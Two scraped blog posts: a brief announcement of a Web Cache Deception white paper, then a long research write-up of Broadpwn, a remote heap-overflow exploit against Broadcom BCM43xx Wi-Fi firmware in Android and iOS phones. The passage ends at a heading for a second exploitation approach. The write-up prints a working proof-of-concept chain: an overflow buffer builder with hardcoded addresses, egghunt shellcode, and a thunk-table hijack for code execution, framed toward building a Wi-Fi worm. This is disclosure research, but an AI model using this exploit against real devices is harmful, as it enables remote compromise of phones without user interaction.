Wednesday, July 26, 2017

Web Cache Deception Attack: White Paper

The Web Cache Deception attack vector was first published on this blog in February 2017. Since then, I have presented it at Black Hat USA 2017 and BSides Tel-Aviv 2017. Now, I'm proud to release a white paper explaining all about this attack, including:

- Attack methodology
- Implications
- Conditions
- Known web frameworks and caching mechanisms that meet the attack conditions
- Mitigations

Web Cache Deception Attack White Paper, July 2017

In addition, you can find the presentation used at the Black Hat USA 2017 conference.

Huge thanks to all those who assisted along the way: Sagi Cohen, Bill Ben Haim, Sophie Lewin, Or Kliger, Gil Biton, Yakir Mordehay, Hagar Livne.

Would love to receive your feedback here and on Twitter (@omer_gil). Enjoy!

Posted by Omer Gil at 1:19:00 PM

Source: https://omergil.blogspot.ro/2017/07/web-cache-deception-attack-white-paper.html
Posted by Exodus Intel VRT
Posted on July 26, 2017
Posted under exploitation, Vulnerabilities

Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom's Wi-Fi Chipsets

Author: Nitay Artenstein

Introduction

Fully remote exploits that allow for compromise of a target without any user interaction have become something of a myth in recent years. While some are occasionally still found against insecure and unpatched targets such as routers, various IoT devices or old versions of Windows, practically no remotely exploitable bugs that reliably bypass DEP and ASLR have been found on Android and iOS. To compromise these devices, attackers normally resort to browser bugs. The downside of this approach, from an attacker's perspective, is that successful exploitation requires the victim to either click on an untrusted link or connect to an attacker's network and actively browse to a non-HTTPS site. Paranoid users will be wary of doing either of these things.

It is naive to assume that a well-funded attacker will accept these limitations. As modern operating systems become hardened, attackers are hard at work looking for new, powerful and inventive attack vectors. However, remote exploits are not a simple matter. Local attacks benefit from extensive interaction with the targeted platform through interfaces such as syscalls or JavaScript, which allows the attacker to make assumptions about the target's address space and memory state. Remote attackers, on the other hand, have much more limited interaction with the target. For a remote attack to be successful, the bug on which it is based needs to allow the attacker to make as few assumptions as possible about the target's state. This research is an attempt to demonstrate what such an attack, and such a bug, looks like.
Broadpwn is a fully remote attack against Broadcom's BCM43xx family of WiFi chipsets, which allows for code execution on the main application processor in both Android and iOS. It is based on an unusually powerful 0-day that allowed us to leverage it into a reliable, fully remote exploit.

In this post, we will describe our thought process in choosing an attack surface suitable for developing a fully remote exploit, explain how we homed in on particular code regions in order to look for a bug that can be triggered without user interaction, and walk through the stages of developing this bug into a reliable, fully remote exploit. We will conclude with a bonus. During the early 2000s, self-propagating malware – or "worms" – were common. But the advent of DEP and ASLR largely killed off remote exploitation, and Conficker (2009) will be remembered as the last self-propagating network worm. We will revive this tradition by turning Broadpwn into the first WiFi worm for mobile devices, and the first public network worm in eight years.

THE ATTACK SURFACE

Two words make up an attacker's worst nightmare when considering remote exploitation: DEP and ASLR. In order to leverage a bug into a full code execution primitive, some knowledge of the address space is needed. But with ASLR enabled, such knowledge is considerably more difficult to obtain, and sometimes requires a separate infoleak. And, generally speaking, infoleaks are harder to obtain on remote attack surfaces, since the target's interaction with the attacker is limited. Over the past decade, hundreds of remote bugs have died miserable deaths due to DEP and ASLR.

Security researchers who work with embedded systems don't have such troubles. Routers, cameras, and various IoT devices typically have no security mitigations enabled. Smartphones are different: Android and iOS have had ASLR enabled from a relatively early stage [a].
But this definition is misleading, since it refers only to code running on the main application processor. A smartphone is a complex system. Which other processors exist in a phone?

Most Android and iOS smartphones have two additional chips which are particularly interesting to us from a remote standpoint: the baseband and the WiFi chipset. The baseband is a fascinating and large attack surface, and it doubtlessly draws the attention of many attackers. However, attacking basebands is a difficult business, mainly due to fragmentation. The baseband market is currently going through a major shift: if, several years ago, Qualcomm was the unchallenged market leader, today the market has split up among several competitors. Samsung's Shannon modems are prevalent in most of the newer Samsungs; Intel's Infineon chips have replaced Qualcomm as the baseband for iPhone 7 and above; and MediaTek's chips are a popular choice for lower-cost Androids. And to top it off, Qualcomm is still dominant in higher-end non-Samsung Androids.

WiFi chipsets are a different story: here, Broadcom is still the dominant choice for most popular smartphones, including most Samsung Galaxy models, Nexus phones and iPhones. A peculiar detail makes the story even more interesting. On laptops and desktop computers, the WiFi chipset generally handles the PHY layer, while the kernel driver is responsible for handling layer 3 and above. This is known as a SoftMAC implementation. On mobile devices, however, power considerations often cause the device designers to opt for a FullMAC WiFi implementation, where the WiFi chip is responsible for handling the PHY, MAC and MLME layers on its own, and hands the kernel driver data packets that are ready to be sent up. This means, of course, that the chip handles considerable attacker-controlled input on its own.

Another detail sealed our choice.
Running some tests on Broadcom's chips, we realised with joy that there was no ASLR and that the whole of RAM has RWX permissions – meaning that we can read, write and run code anywhere in memory. While the same holds partially true for Shannon and MediaTek basebands, Qualcomm basebands do support DEP and are therefore somewhat harder to exploit.

Before we continue, it should be mentioned that a considerable drawback exists when attacking the WiFi chip. The amount of code running on WiFi chipsets is considerably smaller than the code running on basebands, and the 802.11 family of protocols is significantly less complicated to implement than the nightmarish range of protocols that basebands have to implement, including GSM and LTE. On a BCM4359 WiFi SoC, we identified approximately 9,000 functions. On a Shannon baseband, there are above 80,000. That means that a reasonably determined code-auditing effort on Broadcom's part has a good chance of closing off many exploitable bugs, making an attacker's life much harder. Samsung would need to put in considerably more effort to arrive at the same result.

THE BCM43XX FAMILY

Broadcom's WiFi chips are the dominant choice for the WiFi slot in high-end smartphones. In a non-exhaustive survey, we found that the following models use Broadcom WiFi chips:

- Samsung Galaxy from S3 through S8, inclusive
- All Samsung Notes
- Nexus 5, 6, 6X and 6P
- All iPhones after iPhone 5

The chip models range from the BCM4339 for the oldest phones (notably the Nexus 5) up to the BCM4361 for the Samsung Galaxy S8. This research was carried out on both a Samsung Galaxy S5 (BCM4354) and a Samsung Galaxy S7 (BCM4359), with the main exploit development process taking place on the S7.
Reverse engineering and debugging the chip's firmware is made relatively simple by the fact that the unencrypted firmware binary is loaded into the chip's RAM by the main OS every time the chip is reset, so a simple search through the phone's filesystem will usually suffice to locate the Broadcom firmware. On Linux kernels, its path is usually defined in the config variable BCMDHD_FW_PATH. Another blessing is that there is no integrity check on the firmware, so it's quite easy to patch the original firmware, add hooks that print debugging output or otherwise modify its behaviour, and modify the kernel to load our firmware instead. A lot of this research was carried out by placing hooks at the right places and observing the system's behaviour (and, more interestingly, its misbehaviour).

All the BCM chips that we've observed run an ARM Cortex-R4 microcontroller. One of the system's main quirks is that a large part of the code runs from ROM, whose size is 900k. Patches and additional functionality are added in RAM, also 900k in size. In order to facilitate patching, an extensive thunk table is used in RAM, and calls are made into that table at specific points during execution. Should a bug fix be issued, the thunk table entry can be changed to redirect to the newer code.

In terms of architecture, it would be correct to look at the BCM43xx as a WiFi SoC, since two different chips handle packet processing. While the main processor, the Cortex-R4, handles the MAC and MLME layers before handing the received packets to the Linux kernel, a separate chip, using a proprietary Broadcom processor architecture, handles the 802.11 PHY layer. Another component of the SoC is the interface to the application processor: older BCM chips used the slower SDIO connection, while the BCM4358 and above use PCIe. The main ARM microcontroller in the WiFi SoC runs a mysterious proprietary RTOS known as HNDRTE.
While HNDRTE is closed-source, there are several convenient places to obtain older versions of the source code. Previous researchers have mentioned the Linux brcmsmac driver, a driver for SoftMAC WiFi chips which handle only the PHY layer while letting the kernel do the rest. While this driver does contain source code which is also common to HNDRTE itself, we found that most of the driver code which handles packet processing (and that's where we intended to find bugs) was significantly different from the code found in the firmware, and therefore did not help us with reversing the interesting code areas.

The most convenient resource we found was the source code for the VMG-1312, a forgotten router which also uses a Broadcom chipset. While the brcmsmac driver contains code which was open-sourced by Broadcom for use with Linux, the VMG-1312 sources contain proprietary Broadcom closed-source code, bearing the warning "This is UNPUBLISHED PROPRIETARY SOURCE CODE of Broadcom Corporation". Apparently, the Broadcom code was published by mistake together with the rest of the VMG-1312 sources. The leaked code contains most of the key functions we find in the firmware blob, but it appears to be dated, and does not contain much of the processing code for the newer 802.11 protocols. Yet it was extremely useful during the course of this research, since the main packet handling functions have not changed much. By comparing the source code with the firmware, we were able to get a quick high-level view of the packet processing code section, which enabled us to home in on interesting code areas and focus on the next stage: finding a suitable bug.

FINDING THE RIGHT BUG

By far, the biggest challenge in developing a fully remote attack is finding a suitable bug.
In order to be useful, the right bug will need to meet all of the following requirements:

- It can be triggered without requiring interaction on behalf of the victim
- It does not require us to make assumptions about the state of the system, since our ability to leak information is limited in a remote attack
- After successful exploitation, it does not leave the system in an unstable state

Finding a bug that can be triggered without user interaction is a tall order. For example, CVE-2017-0561, a heap overflow in Broadcom's TDLS implementation discovered by Project Zero, still requires the attacker and the victim to be on the same WPA2 network. This means the attackers either need to trick the victim into connecting to a WPA2 network that they control, or be able to connect to a legitimate WPA2 network which the victim is already on. So where can we find a more suitable bug?

To answer that question, let's look briefly at the 802.11 association process. The process begins with the client, called a mobile station (STA) in 802.11 lingo, sending out Probe Request packets to look for nearby Access Points (APs) to connect to. The Probe Requests contain the data rates supported by the STA, as well as 802.11 capabilities such as 802.11n or 802.11ac. They will also normally contain a list of preferred SSIDs that the STA has previously connected to. In the next phase, an AP that supports the advertised data rates will send a Probe Response containing data such as the supported encryption types and 802.11 capabilities of the AP. After that, the STA and the AP will both send out Authentication Open Sequence packets, which are an obsolete leftover from the days when WLAN networks were secured by WEP. In the last phase of the association process, the STA sends an Association Request to the AP it has chosen to connect to. This packet includes the chosen encryption type, as well as various other data about the STA.
All the packet types in the above association sequence have the same structure: a basic 802.11 header, followed by a series of 802.11 Information Elements (IEs). The IEs are encoded using the well-known TLV (Type-Length-Value) convention, with the first byte of the IE denoting the type of information, the second byte holding its length, and the following bytes holding the actual data. By parsing this data, both the AP and the STA get information about the requirements and capabilities of their counterpart in the association sequence. Any actual authentication, implemented using protocols such as WPA2, happens only after this association sequence.

Since there are no real elements of authentication within the association sequence, it's possible to impersonate any AP using its MAC address and SSID. The STA will only be able to tell that the AP is fake during the later authentication phase. This makes any bug in the association sequence especially valuable: an attacker who finds a bug in the association process will be able to sniff the victim's probe requests over the air, impersonate an AP that the STA is looking for, and then trigger the bug without going through any authentication.

When looking for the bug, we were assisted by the highly modular way in which Broadcom's code handles the different protocols in the 802.11 family and the different functionalities of the firmware itself. The main relevant function in this case is wlc_attach_module, which abstracts each different protocol or functionality as a separate module. The names of the various initialization functions that wlc_attach_module calls are highly indicative.
This is some sample code:

```c
prot_g = wlc_prot_g_attach(wlc);
wlc->prot_g = prot_g;
if (!prot_g)
    goto fail;

prot_n = wlc_prot_n_attach(wlc);
wlc->prot_n = prot_n;
if (!prot_n)
    goto fail;

ccx = wlc_ccx_attach(wlc);
wlc->ccx = ccx;
if (!ccx)
    goto fail;

amsdu = wlc_amsdu_attach(wlc);
wlc->amsdu = amsdu;
if (!amsdu)
    goto fail;
```

Each module initialization function then installs handlers which are called whenever a packet is received or generated. These callbacks are responsible for either parsing the contents of a received packet which are relevant for a specific protocol, or generating the protocol-relevant data for an outgoing packet. We're mostly interested in the former, since that is the code which parses attacker-controlled data, so the relevant function here is wlc_iem_add_parse_fn, which has the following prototype:

```c
void wlc_iem_add_parse_fn(iem_info *iem, uint32 subtype_bitfield,
                          uint32 iem_type, callback_fn_t fn, void *arg);
```

The second and third arguments are particularly relevant here. subtype_bitfield is a bitfield containing the different packet subtypes (such as probe request, probe response, association request, etc.) that the parser is relevant for. The third argument, iem_type, contains the IE type (covered earlier) that this parser handles.

wlc_iem_add_parse_fn is called by the various module initialization functions in wlc_attach_module. By writing some code to parse the arguments passed to it, we can make a list of the parsers being called for each phase of the association sequence. By narrowing our search down to this list, we can avoid looking for bugs in areas of the code which don't interest us: areas which are reached only after the user has completed the full association and authentication process with an AP. Any bug that we might find in those areas would fail to meet our most important criterion – the ability to be triggered without user interaction.

Using the approach above, we became lucky quite soon.
In fact, it took us time to realise how lucky.

THE BUG

Wireless Multimedia Extensions (WMM) are a Quality-of-Service (QoS) extension to the 802.11 standard, enabling the Access Point to prioritize traffic according to different Access Categories (ACs), such as voice, video or best effort. WMM is used, for instance, to ensure optimal QoS for especially data-hungry applications such as VoIP or video streaming. During a client's association process with an AP, the STA and AP both announce their WMM support level in an Information Element (IE) appended to the end of the Beacon, Probe Request, Probe Response, Association Request and Association Response packets.

In our search for bugs in functions that parse association packets after being installed by wlc_iem_add_parse_fn, we stumbled upon the following function:

```c
void wlc_bss_parse_wme_ie(wlc_info *wlc, ie_parser_arg *arg)
{
    unsigned int frame_type;
    wlc_bsscfg *cfg;
    bcm_tlv *ie;
    unsigned char *current_wmm_ie;
    int flags;

    frame_type = arg->frame_type;
    cfg = arg->bsscfg;
    ie = arg->ie;
    current_wmm_ie = cfg->current_wmm_ie;

    if ( frame_type == FC_REASSOC_REQ ) {
        ... <handle reassociation requests> ...
    }

    if ( frame_type == FC_ASSOC_RESP ) {
        ...
        if ( wlc->pub->_wme ) {
            if ( !(flags & 2) ) {
                ...
                if ( ie ) {
                    ...
                    cfg->flags |= 0x100u;
                    memcpy(current_wmm_ie, ie->data, ie->len);
```

In a classic bug, the program calls memcpy() in the last line without verifying that the buffer current_wmm_ie (our name) is large enough to hold the data of size ie->len. But it's too early to call it a bug: let's see where current_wmm_ie is allocated to figure out whether it really is possible to overflow it. We can find the answer in the function which allocates the overflowed structure:

```c
wlc_bsscfg *wlc_bsscfg_malloc(wlc_info *wlc)
{
    wlc_info *wlc;
    wlc_bss_info *current_bss;
    wlc_bss_info *target_bss;
    wlc_pm_st *pm;
    wmm_ie *current_wmm_ie;
    ...
```
```c
    current_bss = wlc_calloc(0x124);
    wlc->current_bss = current_bss;
    if ( !current_bss )
        goto fail;

    target_bss = wlc_calloc(0x124);
    wlc->target_bss = target_bss;
    if ( !target_bss )
        goto fail;

    pm = wlc_calloc(0x78);
    wlc->pm = pm;
    if ( !pm )
        goto fail;

    current_wmm_ie = wlc_calloc(0x2C);
    wlc->current_wmm_ie = current_wmm_ie;
    if ( !current_wmm_ie )
        goto fail;
```

As we can see in the last section, the current_wmm_ie buffer is allocated with a length of 0x2c (44) bytes, while the maximum size for an IE is 0xff (255) bytes. This means that we have a nice maximum overflow of 211 bytes.

But an overflow would not necessarily get us very far. For example, CVE-2017-0561 (the TDLS bug) is hard to exploit because it only allows the attacker to overflow the size field of the next heap chunk, requiring complicated heap acrobatics in order to get a write primitive, all the while corrupting the state of the heap and making execution restoration more difficult. As far as we know, this bug could land us in the same bad situation. So let's understand what exactly is being overflowed here.

Given that the HNDRTE implementation of malloc() allocates chunks from the top of memory to the bottom, we can assume, by looking at the above code, that the wlc->pm struct will be allocated immediately following the wlc->current_wmm_ie struct which is the target of the overflow. To validate this assumption, let's look at a hex dump of current_wmm_ie, which on the BCM4359 that we tested was always allocated at 0x1e7dfc:

```
00000000: 00 50 f2 02 01 01 00 00 03 a4 00 00 27 a4 00 00  .P..........'...
00000010: 42 43 5e 00 62 32 2f 00 00 00 00 00 00 00 00 00  BC^.b2/.........
00000020: c0 0b e0 05 0f 00 00 01 00 00 00 00 7a 00 00 00  ............z...
00000030: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000040: 64 7a 1e 00 00 00 00 00 b4 7a 1e 00 00 00 00 00  dz.......z......
00000050: 00 00 00 00 00 00 00 00 c8 00 00 00 c8 00 00 00  ................
00000060: 00 00 00 00 00 00 00 00 9c 81 1e 00 1c 81 1e 00  ................
00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000a0: 00 00 00 00 00 00 00 00 2a 01 00 00 00 c0 ca 84  ........*.......
000000b0: ba b9 06 01 0d 62 72 6f 61 64 70 77 6e 5f 74 65  .....broadpwn_te
000000c0: 73 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00  st..............
000000d0: 00 00 00 00 00 00 fb ff 23 00 0f 00 00 00 01 10  ........#.......
000000e0: 01 00 00 00 0c 00 00 00 82 84 8b 0c 12 96 18 24  ...............$
000000f0: 30 48 60 6c 00 00 00 00 00 00 00 00 00 00 00 00  0H`l............
```

Looking at offset 0x2c, which is the end of current_wmm_ie, we can see the size of the next heap chunk, 0x7a – which is the exact size of the wlc->pm struct plus a two-byte alignment. This validates our assumption, and means that our overflow always runs into wlc->pm, which is a struct of type wlc_pm_st.

It's worthwhile to note that the positions of both current_wmm_ie and pm are completely deterministic for a given firmware version. Since these structures are allocated early in the initialization process, they will always be positioned at the same addresses. This fortunately spares us the need for complicated heap feng-shui – we always overflow into the same address and the same structure.

THE EXPLOIT

Finding a bug was the easy part. Writing a reliable remote exploit is the hard part, and this is usually where a bug is found to be either unexploitable or so difficult to exploit as to be impractical. In our view, the main difficulty in writing a remote exploit is that some knowledge is needed about the address space of the attacked program.
The other difficulty is that mistakes are often unforgivable: in a kernel remote exploit, for instance, any misstep will result in a kernel panic, immediately alerting the victim that something is wrong – especially if the crash is repeated several times.

In Broadpwn, both of these difficulties are mitigated by two main lucky facts. First, the addresses of all the relevant structures and data that we use during the exploit are consistent for a given firmware build, meaning that we do not need any knowledge of dynamic addresses – after testing the exploit once on a given firmware build, it will be consistently reproducible. Second, crashing the chip is not particularly noisy. The main indication in the user interface is the disappearance of the WiFi icon, and a temporary disruption of connectivity as the chip resets. This creates a situation where it's possible to build a dictionary of addresses for a given firmware, then repeatedly launch the exploit until we have brute-forced the correct set of addresses. A different, experimental solution, which does not require knowledge of any version-specific addresses, is given at the end of this section.

Let's first look at how we achieve a write primitive. The overflowed structure is of type wlc_pm_st, and handles power management states, including entering and leaving power-saving mode.
The struct is defined as follows:

```c
typedef struct wlc_pm_st {
    uint8 PM;
    bool PM_override;
    mbool PMenabledModuleId;
    bool PMenabled;
    bool PMawakebcn;
    bool PMpending;
    bool priorPMstate;
    bool PSpoll;
    bool check_for_unaligned_tbtt;
    uint16 pspoll_prd;
    struct wl_timer *pspoll_timer;
    uint16 apsd_trigger_timeout;
    struct wl_timer *apsd_trigger_timer;
    bool apsd_sta_usp;
    bool WME_PM_blocked;
    uint16 pm2_rcv_percent;
    pm2rd_state_t pm2_rcv_state;
    uint16 pm2_rcv_time;
    uint pm2_sleep_ret_time;
    uint pm2_sleep_ret_time_left;
    uint pm2_last_wake_time;
    bool pm2_refresh_badiv;
    bool adv_ps_poll;
    bool send_pspoll_after_tx;
    wlc_hwtimer_to_t *pm2_rcv_timer;
    wlc_hwtimer_to_t *pm2_ret_timer;
} wlc_pm_st_t;
```

Four members of this struct are especially interesting to control from an exploitation viewpoint: pspoll_timer and apsd_trigger_timer of type wl_timer, and pm2_rcv_timer and pm2_ret_timer of type wlc_hwtimer_to_t. First, let's look at the latter:

```c
typedef struct _wlc_hwtimer_to {
    struct _wlc_hwtimer_to *next;
    uint timeout;
    hwtto_fn fun;
    void *arg;
    bool expired;
} wlc_hwtimer_to_t;
```

The function wlc_hwtimer_del_timeout is called after the packet is processed and the overflow is triggered, and receives pm2_ret_timer as an argument:

```c
void wlc_hwtimer_del_timeout(wlc_hwtimer_to *newto)
{
    wlc_hwtimer_to *i;
    wlc_hwtimer_to *next;
    wlc_hwtimer_to *this;

    for ( i = &newto->gptimer->timer_list; ; i = i->next ) {
        this = i->next;
        if ( !i->next )
            break;
        if ( this == newto ) {
            next = newto->next;
            if ( newto->next )
                next->timeout += newto->timeout;  // write-4 primitive
            i->next = next;
            this->fun = 0;
            return;
        }
    }
}
```

As can be seen from the code, by overwriting the value of newto->next and causing it to point to an attacker-controlled location, the memory location at next->timeout can be incremented by the attacker-controlled value in newto->timeout. This amounts to a write-what-where primitive, with the limitation that the write is an increment rather than a plain store, so the original contents of the overwritten memory location must be known.
A less limited write primitive can be achieved through the pspoll_timer member, of type struct wl_timer. This struct is handled by a callback function triggered regularly during the association process:

```c
int timer_func(struct wl_timer *t)
{
    prev_cpsr = j_disable_irqs();
    v3 = t->field_20;
    ...
    if ( v3 ) {
        v7 = t->field_18;
        v8 = &t->field_8;
        if ( &t->field_8 == v7 ) {
            ...
        }
        else {
            v9 = t->field_1c;
            v7->field_14 = v9;
            *(v9 + 16) = v7;
            if ( *v3 == v8 )
                v7->field_18 = v3;
        }
        t->field_20 = 0;
    }
    j_restore_cpsr(prev_cpsr);
    return 0;
}
```

As can be seen towards the end of the function, we have a much more convenient write primitive here. Effectively, we can write the value we store in field_1c into an address we store in field_18. With this, we can write an arbitrary value into any memory address, without the limitations of the previous write primitive we found.

The next question is how to leverage our write primitive into full code execution. For this, two approaches will be considered: one which requires us to know firmware memory addresses in advance (or to brute-force those addresses by crashing the chip several times), and another method, more difficult to implement, which requires a minimum of that knowledge. We'll look at the former approach first.

To achieve a write primitive, we need to overwrite pspoll_timer with a memory address that we control. Since the addresses of both wlc->current_wmm_ie and wlc->pm are known and consistent for a given firmware build, and since we can fully overwrite their contents, we can clobber pspoll_timer to point anywhere within these objects. For the creation of a fake wl_timer object, the unused area between wlc->current_wmm_ie and wlc->pm is an ideal fit. Placing our fake timer object there, we'll cause field_18 to point to the address we want to overwrite (minus an offset of 0x14) and have field_1c hold the value we want to write to that address.
After we trigger the overflow, we only need to wait for the timer function to be called and perform our overwrite for us. The next stage is to determine which memory address we want to overwrite. As can be seen in the above function, immediately after our write is performed, a call to j_restore_cpsr is made. This function basically does one thing: it refers to the function thunk table found in RAM (mentioned previously when we described HNDRTE and the BCM43xx architecture), pulls the address of restore_cpsr from the thunk table, and jumps to it. Therefore, by overwriting the restore_cpsr entry in the thunk table, we can cause our own function to be called immediately afterwards. This has the advantage of being portable, since both the starting address of the thunk table and the index of the pointer to restore_cpsr within it are consistent between firmware builds.

We have now obtained control of the instruction pointer and have a fully controlled jump to an arbitrary memory address. This is made sweeter by the fact that there are no restrictions on memory permissions – the entire RAM is RWX, meaning we can execute code from the heap, the stack or wherever else we choose. But we still face a problem: finding a good location to place our shellcode. We can write the shellcode to the wlc->pm struct that we are overflowing, but this poses two difficulties: first, our space is limited by the fact that we only have an overflow of 211 bytes. Second, the wlc->pm struct is constantly in use by other parts of the HNDRTE code, so placing our shellcode at the wrong place within the structure would cause the whole system to crash. After some trial and error, we realized that we had a tiny amount of space for our code: 12 bytes within the wlc->pm struct (the only place where overwriting data in the struct would not crash the system), and 32 bytes in an adjacent struct which held an SSID string (which we could freely overwrite).
44 bytes of code are not a particularly useful payload – we'll need to find somewhere else to store our main payload. The normal way to solve such a problem in exploits is to look for a spray primitive: a way to write large chunks of memory, giving us a convenient and predictable location to store our payload. While spray primitives can be an issue in remote exploits, since sometimes the remote code doesn't give us a sufficient interface to write large chunks of memory, in this case it was easier than expected – in fact, we didn't even need to go through the code to look for suitable allocation primitives. We just had to use common sense.

Any WiFi implementation needs to handle many packets at any given time. For this, HNDRTE provides the implementation of a ring buffer shared by the D11 chip and the main microcontroller. Packets arriving over the PHY are repeatedly written to this buffer until it gets filled, at which point new packets are simply written to the beginning of the buffer, overwriting any existing data there. For us, this means that all we need to do is broadcast our payload over the air and over multiple channels. As the WiFi chip repeatedly scans for available APs (this is done every few seconds, even when the chip is in power-saving mode), the ring buffer gets filled with our payload – giving us the perfect place to jump to and enough space to store a reasonably sized payload.

What we'll do, therefore, is this: write a small stub of shellcode within wlc->pm which saves the stack frame (so we can restore normal execution afterwards) and jumps to the next 32 bytes of shellcode, which we store in the unused SSID string. This compact shellcode is nothing other than classic egghunting shellcode, which searches the ring buffer for a magic number indicating the beginning of our payload, then jumps to it. So, time to look at the POC code.
This is how the exploit buffer is crafted:

u8 *generate_wmm_exploit_buf(u8 *eid, u8 *pos)
{
    uint32_t curr_len = (uint32_t) (pos - eid);
    uint32_t overflow_size = sizeof(struct exploit_buf_4359);
    uint32_t p_patch = 0x16010C;        // p_restore_cpsr
    uint32_t buf_base_4359 = 0x1e7e02;
    struct exploit_buf_4359 *buf = (struct exploit_buf_4359 *) pos;

    memset(pos, 0x0, overflow_size);

    // Shellcode thunk
    memcpy(&buf->pm_st_field_40_shellcode_start_106, shellcode_start_bin,
           sizeof(shellcode_start_bin));

    buf->ssid.ssid[0] = 0x41;
    buf->ssid.ssid[1] = 0x41;
    buf->ssid.ssid[2] = 0x41;
    memcpy(&buf->ssid.ssid[3], egghunt_bin, sizeof(egghunt_bin));
    buf->ssid.size = sizeof(egghunt_bin) + 3;

    // Point pspoll timer to our fake timer object
    buf->pm_st_field_10_pspoll_timer_58 = buf_base_4359 +
        offsetof(struct exploit_buf_4359, t_field_0_2);

    buf->pm_st_size_38 = 0x7a;
    buf->pm_st_field_18_apsd_trigger_timer_66 = 0x1e7ab4;
    buf->pm_st_field_28_82 = 0xc8;
    buf->pm_st_field_2c_86 = 0xc8;
    buf->pm_st_field_38_pm2_rcv_timer_98 = 0x1e819c;
    buf->pm_st_field_3c_pm2_ret_timer_102 = 0x1e811c;
    buf->pm_st_field_78_size_162 = 0x1a2;
    buf->bss_info_field_0_mac1_166 = 0x84cac000;
    buf->bss_info_field_4_mac2_170 = 0x106b9ba;
    buf->t_field_20_34 = 0x200000;

    // Point field_18 to the restore_cpsr thunk
    buf->t_field_18_26 = p_patch - 0x14;

    // Write our shellcode address to the thunk
    buf->t_field_1c_30 = buf_base_4359 +
        offsetof(struct exploit_buf_4359, pm_st_field_40_shellcode_start_106) + 1;

    curr_len += overflow_size;
    pos += overflow_size;

    return pos;
}

struct shellcode_ssid {
    unsigned char size;
    unsigned char ssid[31];
} STRUCT_PACKED;

struct exploit_buf_4359 {
    uint16_t stub_0;
    uint32_t t_field_0_2;
    uint32_t t_field_4_6;
    uint32_t t_field_8_10;
    uint32_t t_field_c_14;
    uint32_t t_field_10_18;
    uint32_t t_field_14_22;
    uint32_t t_field_18_26;
    uint32_t t_field_1c_30;
    uint32_t t_field_20_34;
    uint32_t pm_st_size_38;
    uint32_t pm_st_field_0_42;
    uint32_t pm_st_field_4_46;
    uint32_t pm_st_field_8_50;
    uint32_t pm_st_field_c_54;
    uint32_t pm_st_field_10_pspoll_timer_58;
    uint32_t pm_st_field_14_62;
    uint32_t pm_st_field_18_apsd_trigger_timer_66;
    uint32_t pm_st_field_1c_70;
    uint32_t pm_st_field_20_74;
    uint32_t pm_st_field_24_78;
    uint32_t pm_st_field_28_82;
    uint32_t pm_st_field_2c_86;
    uint32_t pm_st_field_30_90;
    uint32_t pm_st_field_34_94;
    uint32_t pm_st_field_38_pm2_rcv_timer_98;
    uint32_t pm_st_field_3c_pm2_ret_timer_102;
    uint32_t pm_st_field_40_shellcode_start_106;
    uint32_t pm_st_field_44_110;
    uint32_t pm_st_field_48_114;
    uint32_t pm_st_field_4c_118;
    uint32_t pm_st_field_50_122;
    uint32_t pm_st_field_54_126;
    uint32_t pm_st_field_58_130;
    uint32_t pm_st_field_5c_134;
    uint32_t pm_st_field_60_egghunt_138;
    uint32_t pm_st_field_64_142;
    uint32_t pm_st_field_68_146;   // <- End
    uint32_t pm_st_field_6c_150;
    uint32_t pm_st_field_70_154;
    uint32_t pm_st_field_74_158;
    uint32_t pm_st_field_78_size_162;
    uint32_t bss_info_field_0_mac1_166;
    uint32_t bss_info_field_4_mac2_170;
    struct shellcode_ssid ssid;
} STRUCT_PACKED;

And this is the shellcode which carries out the egghunt:

__attribute__((naked)) void shellcode_start(void)
{
    asm("push {r0-r3,lr}\n"
        "bl egghunt\n"
        "pop {r0-r3,pc}\n");
}

void egghunt(unsigned int cpsr)
{
    unsigned int egghunt_start = RING_BUFFER_START;
    unsigned int *p = (unsigned int *) egghunt_start;
    void (*f)(unsigned int);

loop:
    p++;
    if (*p != 0xc0deba5e)
        goto loop;

    f = (void (*)(unsigned int))(((unsigned char *) p) + 5);
    f(cpsr);

    return;
}

So we have a jump to our payload, but is that all we need to do? Remember that we have seriously corrupted the wlc->pm object, and the system will not remain stable for long if we leave it that way. Also recall that one of our main objectives is to avoid crashing the system – an exploit which gives an attacker transient control is of limited value. Therefore, before any further action, our payload needs to restore the wlc->pm object to its normal condition.
Since all addresses in this object are consistent for a given firmware build, we can just copy these values back into the buffer and restore the object to a healthy state. Here’s an example of what an initial payload will look like:

unsigned char overflow_orig[] = {
    0x00, 0x00, 0x03, 0xA4, 0x00, 0x00, 0x27, 0xA4,
    0x00, 0x00, 0x42, 0x43, 0x5E, 0x00, 0x62, 0x32,
    0x2F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xC0, 0x0B, 0xE0, 0x05, 0x0F, 0x00,
    0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x7A, 0x00,
    0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x64, 0x7A, 0x1E, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xB4, 0x7A, 0x1E, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0xC8, 0x00, 0x00, 0x00, 0xC8, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x9C, 0x81, 0x1E, 0x00, 0x1C, 0x81,
    0x1E, 0x00
};

void entry(unsigned int cpsr)
{
    int i = 0;
    unsigned int *p_restore_cpsr = (unsigned int *) 0x16010C;

    *p_restore_cpsr = (unsigned int) restore_cpsr;

    printf("Payload triggered, restoring CPSR\n");
    restore_cpsr(cpsr);

    printf("Restoring contents of wlc->pm struct\n");
    memcpy((void *) (0x1e7e02), overflow_orig, sizeof(overflow_orig));

    return;
}

At this stage, we have achieved our first and most important mission: we have reliable, consistent RCE against the BCM chip, and our control of the system is not transient – the chip does not crash following the exploit. At this point, the only way we will lose control of the chip is if the user turns off WiFi or if the chip crashes.

THE EXPLOIT – SECOND APPROACH

